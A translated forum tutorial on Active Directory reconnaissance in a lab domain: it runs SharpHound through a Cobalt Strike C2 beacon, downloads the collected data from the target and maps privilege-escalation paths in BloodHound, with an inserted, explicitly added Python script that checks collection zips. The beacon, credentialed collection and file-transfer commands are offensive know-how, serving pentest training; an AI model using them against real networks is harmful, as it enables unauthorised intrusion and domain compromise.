- 14 Jul 2024
Hi THT members, today we will learn how to install and use BloodHound in the Active Directory
enumeration step, and for C2 (Command and Control) we will use Cobalt Strike.
This thread is a translated version of the following thread:
BloodHound ile Active Directory hakkında bilgi toplama II (Cobalt Strike C2)
The goal of the BloodHound tool is to provide the attacker with an easier and faster way of conducting
the Domain Enumeration step in internal infrastructure pentests of Active Directory based environments.
In complex environments, BloodHound is helpful because attacking an AD network is not only about
exploiting CVE vulnerabilities in the network environment, but also about exploiting misconfigurations that
open additional paths for lateral movement. BloodHound helps us find these misconfigurations
and build a full map of the Active Directory network environment.
BloodHound - SharpHound
The BloodHound tool assists attackers in mapping and visualizing the Active Directory
network environment. In complex and large network environments, it helps to detect misconfigurations in
GPOs, Trusts, ACLs, ADCS, Delegations, etc., which allow attackers to take further lateral movement
and privilege escalation steps. BloodHound uses LDAP (Lightweight Directory Access Protocol)
or SMB (Server Message Block) based protocols for Domain Discovery.
BloodHound's role is to visualize the data graphically. The collected data is stored and processed
in Neo4j, a graph database that is queried with the Cypher language. BloodHound's graph interface
displays the collected data as graphs.

(using the Neo4j console vs. using GUI mode)

There are 3 different ways to collect information from the target system:
- BloodHound.py (Python ingestor) is a Python script for collecting Active Directory data that can be run from your
Linux machine, but in order to run it you need credentials for the target, such as a username and password.
Code:
python3 bloodhound.py -u <UserName> -p <Password> -ns <Domain Controller's IP> -d <Domain> -c All
- SharpHound.exe (C#, EXE ingestor) collects information about Active Directory objects and prepares the data to
be uploaded to the database; it must be run on a Windows computer inside the Active Directory network.
Code:
Collects all available data:
> SharpHound.exe -c All
Collects all available data by authenticating with a username and password for a specific domain:
> SharpHound.exe -c All -d <Domain> --ldapusername <UserName> --ldappassword <Password>
Specify the name of the result ZIP file:
> SharpHound.exe --zipfilename C:\path\to\output.zip
- SharpHound.ps1 (PowerShell module): other than the SharpHound EXE, we can also use the PowerShell
module (Invoke-BloodHound). In this method we first import the SharpHound.ps1 PowerShell module with the
Import-Module .\SharpHound.ps1
command, then we can start collecting information with commands like the following:
Code:
> Import-Module .\SharpHound.ps1
> Invoke-BloodHound -CollectionMethod All
> Invoke-BloodHound -CollectionMethod ACL
What kind of information does SharpHound collect by default?
After running SharpHound in the Active Directory network environment, it collects information about: Users,
Computers, Objects in the Domain, Domain Controllers, Domain Trusts, Groups and Memberships, Misconfigurations
related to Delegations, ACLs, GPOs, etc., GPOs, OUs, SQL admin links, members of the local Administrators group, etc.
Once one of the BloodHound data collectors (in our case SharpHound) has run, it generates
JSON files and places them in a zip file. We extract the zip file and upload the JSON files to the BloodHound GUI,
and then we are able to see the data that SharpHound collected about the Active Directory domain environment.
Cobalt Strike C2 (Command and Control)

Cobalt Strike is a framework aimed at helping conduct red team operations. CS has different
types of options and functions, and each of them has its own purpose. For instance: Listeners: create listeners
such as DNS, SMB, TCP, pivoting; upload or download files to the target; configure process injection, loaders and
other bypass-related settings using Malleable C2 profiles, etc. Malleable C2 profiles control Beacon's
in-memory properties, determining how Beacon handles process injection, DLL loading, and
Cobalt Strike's other post-exploitation tactics. You can read a more detailed guide here: Cobalt Strike Manual

Today we target the information gathering step with Cobalt Strike, because Cobalt Strike provides different options
for network scanning: we can use .net and PowerShell commands for Domain Discovery, and we can also use Cobalt Strike
as C2 (Command and Control) to deploy SharpHound on the target computer and run the information gathering step with
BloodHound. For the Domain Enumeration step I created a simple Active Directory network environment with 2 domains in one forest.
First we start the team server:
Code:
./teamserver <ip_address> <password> [<malleableC2profile> <kill_date>]
We go to the cobaltstrike/client folder and then start the client:
Code:
./cobaltstrike
Then the Connect dialog (“Connection Dialog Screen”) is displayed.
In our case we use the standard configuration:

Alias - Specify an alias for the host computer or use the standard name.
Host (Computer) - specify the IP address of your team server.
Port - specify the port number; by default it shows port 50050 for the team server.
User - your username on the team server.
Password - type the shared password for the team server.
After clicking Connect, we enter the GUI of Cobalt Strike:
Now, in order to start Domain Enumeration we need targets which are connected to the Active Directory
network environment. In the Active Directory environment we built previously, such access
can be obtained using different kinds of techniques, such as uploading a webshell to IIS, exploiting services,
exploiting misconfigurations, etc. After access to the internal network has been obtained we can run
information gathering commands in Cobalt Strike and start SharpHound on the target computer.
First, for the Domain Enumeration step we needed some target computers. I gathered users and spawned
sessions for the users whose credentials (username and password) I knew from a previous test.
For better understanding, I opened a new graph, added credentials step by step and spawned sessions so
that our CS graph appears in tree form:

As you can see in the new graph, the users are no longer connected to each other, because instead of
lateral movement we aim at the information gathering step. We don't need connected computers,
we just need to be inside the Active Directory network environment, so we actually need only a small number of
users to run SharpHound. The red computers in the graph are Administrators: when you spawn a session as
Administrator it is shown in red. The blue computers are ordinary users.
In the Cobalt Strike beacon> console we can use commands like net view and net users, but there
are a few things we need to follow, as the Cobalt Strike documentation mentions.
For example, in order to run .net commands we prefix them with the word shell: net users --> shell net users.
Here are the necessary commands to run alongside .net and PowerShell commands:
For running cmd.exe | .net:
shell - runs a command through cmd.exe on the target computer.
run - runs a command without using cmd.exe.
For running powershell.exe:
powershell - runs a command with PowerShell on the target computer.
powerpick - runs PowerShell cmdlets without using powershell.exe.
This command relies on the Unmanaged PowerShell technique.
And another command is:
execute - runs a program in the background and does not capture output.
SharpHound:
Now let's upload SharpHound to one of the target computers. We have different options for uploading
sharphound.exe to the target computer using Cobalt Strike Command and Control.
Basically we do it using the File Browser [Upload], which is a very easy method, but there are
other ways to upload as well, for example using PowerShell
Invoke-WebRequest
, bitsadmin
, etc. [Beacon: cersei.lannister] --> [right-click] --> Explore --> File Browser

Download SharpHound from here:
https://github.com/SpecterOps/SharpHound
After downloading SharpHound, we can upload the exe file to the target computer.
Upload --> SharpHound.exe --> Open
! Actually it is not recommended to upload it to the Desktop folder;
you can use any other folder, but we used Desktop as an example.


Code:
> upload [path/to/file/for/uploading] [path\to\file\in\target]
The beacon console shows that this method uses the upload command, which
runs successfully and uploads the file to the target computer. When we go to the
C:\Users\administrators\Desktop
directory, we can find the sharphound.exe file:

SharpHound: Cross-Domain Collection
Command for collecting the default information:
Code:
.\SharpHound.exe
SharpHound.exe -c All
First of all, as I mentioned above, our Active Directory network environment contains two domains,
and we need to add a few additional flags to collect data from the other domain in the same forest.
In the forest we have the following two domains:
sevenkingdoms.local
and north.sevenkingdoms.local
The Active Directory network environment which I built looks like this:

Cross-Domain Collection means collecting information for different domains in the same forest.
Whether cross-domain information can be collected depends on the trusts between the domains.
In PowerShell we can run the following commands as an example:
Code:
.\SharpHound.exe -c All --domain <domain>
.\SharpHound.exe -c All --domain sevenkingdoms.local
For example, as a user in
north.sevenkingdoms.local
, we move to the sevenkingdoms.local
domain for Domain Discovery. It is also possible to collect cross-domain information using LDAP authentication:
Code:
.\SharpHound.exe -c All --domain <domain> --ldapusername <user> --ldappassword <password>
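As an added example (not from the original thread or from the SharpHound project), here is a Python check for the zip that SharpHound leaves behind after a single-domain or cross-domain run: it reads every JSON file in the archive, counts objects per domain and reports which forest domains are missing from the collection, which is how you confirm that both sevenkingdoms.local and north.sevenkingdoms.local were actually covered before uploading to BloodHound. The file layout (a "data" list of objects with a "Properties" dict and a "meta" block with "type" and "count") and the sample objects are assumptions constructed for this example.

```python
import io, json, zipfile
from collections import Counter, defaultdict

# Constructed sample files in the shape SharpHound writes (an assumption here):
# a "data" list of objects with a "Properties" dict, plus a "meta" block.
USERS_JSON = json.dumps({
    "data": [
        {"Properties": {"name": "CERSEI.LANNISTER@SEVENKINGDOMS.LOCAL",
                        "domain": "SEVENKINGDOMS.LOCAL"}},
        {"Properties": {"name": "JON.SNOW@NORTH.SEVENKINGDOMS.LOCAL",
                        "domain": "NORTH.SEVENKINGDOMS.LOCAL"}},
    ],
    "meta": {"type": "users", "count": 2, "version": 5},
})
COMPUTERS_JSON = json.dumps({
    "data": [
        {"Properties": {"name": "WINTERFELL.NORTH.SEVENKINGDOMS.LOCAL",
                        "domain": "NORTH.SEVENKINGDOMS.LOCAL"}},
    ],
    "meta": {"type": "computers", "count": 1, "version": 5},
})

def build_sample_zip() -> bytes:
    """Bundle the constructed JSON files the way a SharpHound run zips them."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("20240714120000_users.json", USERS_JSON)
        zf.writestr("20240714120000_computers.json", COMPUTERS_JSON)
    return buf.getvalue()

def summarize_collection(zip_bytes: bytes) -> dict:
    """Return {domain: {object_type: count}} over every JSON file in the zip,
    rejecting any file whose meta.count disagrees with its data length."""
    per_domain = defaultdict(Counter)
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for name in zf.namelist():
            if not name.lower().endswith(".json"):
                continue
            doc = json.loads(zf.read(name))
            if doc["meta"]["count"] != len(doc["data"]):
                raise ValueError(f"{name}: meta.count does not match data")
            for obj in doc["data"]:
                domain = obj["Properties"].get("domain", "UNKNOWN").upper()
                per_domain[domain][doc["meta"]["type"]] += 1
    return {d: dict(c) for d, c in per_domain.items()}

def missing_domains(summary: dict, expected: list) -> list:
    """Forest domains the collection did not cover, e.g. after a single-domain run."""
    return sorted(d.upper() for d in expected if d.upper() not in summary)
```

Run summarize_collection on the real zip downloaded through Cobalt Strike and pass both forest domains to missing_domains; a non-empty result means the --domain run did not reach the other domain.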
After running SharpHound, we download the zip file to our computer.
In Cobalt Strike we can use the download command for easy “exfiltration”.
Code:
> download [path\to\file\for\downloading]

We will now transfer the file from Cobalt Strike to our computer.
In Cobalt Strike, in order to see the files your team server has downloaded,
we go to View --> Downloads

Downloaded files are stored on the team server.
Press the Sync button to bring the files to your system.
Cobalt Strike will then download the selected files to the chosen folder on your system.

We will upload these JSON files to BloodHound to see the Active Directory network environment graphically.
BloodHound
We start with the BloodHound installation.
Make sure Java is installed; it is pre-installed in Kali.
Code:
sudo apt-get install bloodhound

BloodHound is powered by a graph database called Neo4j.
Now we go into the neo4j console and do some configuration, like changing the password.
After running the neo4j console it gives us the URL address; we open
http://localhost:7474
in our browser.
Code:
neo4j console

Here we need to change the default password for neo4j. The default username and password are neo4j:neo4j.
First we log in with neo4j:neo4j --> Connect. Then we set a new password.

After typing the new password, click on --> “Change password”.

Now that we've launched Neo4j, we can start BloodHound.
We go to the terminal and type bloodhound.
Code:
bloodhound
Then the BloodHound login page opens automatically. As the user we enter neo4j, and as the password the new password we set before.

Now, after entering the BloodHound GUI, you will see an empty graph.
We will upload the JSON files which we downloaded from Cobalt Strike.
There are different ways to upload data to BloodHound: we can drag and drop files, or we can use the “Upload Data” button.
Select all JSON files and import them into the BloodHound GUI.
Upload Data --> .json --> Open

Additionally, we can see the upload status using the “View Upload Status” button.
In the Database Info tab, we can see information about Users, Computers, Groups, GPOs, OUs, etc.

After loading all the JSON files we can see the graph with the objects.
The following image visualizes the Domain Admins, i.e. the users included in the Domain Admins group.
When we click on the user “cersei.lannister” and then on the Node Info button,
different information about the user is displayed on the left side of the screen.

For instance: List all Kerberoastable Accounts (it shows the Kerberoastable service accounts,
or in other words the users which can be attacked using the Kerberoasting technique), Shortest Paths to Domain Admins, etc.

For example, we select “Shortest Paths to Domain Admin”.
As you can see in the picture, it shows which users and which misconfigurations
can be used in order to reach the Domain Admin user.
Misconfigurations like WriteDacl and GenericAll permissions make it easy to compromise
the Domain Admin user. Of course there are other ways to reach
Domain Admins, but it all depends on the target network environment.

To mark an object as Owned we [right-click] on the object [e.g. user: cersei.lannister] in the GUI --> “Mark User as Owned”.
There are other options, for example: Set as Starting Node (Initial Access, the first user with which we
entered the network), Shortest Path to Here (which users we need to attack in order to reach this user), etc.

After clicking the “Mark User as Owned” button, a “skull” icon is placed on the object,
and later this allows us to run additional queries based on owned objects.

Code:
List all owned objects
MATCH (n) WHERE "owned" in n.system_tags RETURN n
This query can be entered in the Cypher query panel; we click search and see all owned objects.
You can get a detailed guide about Cypher here: Searching with Cypher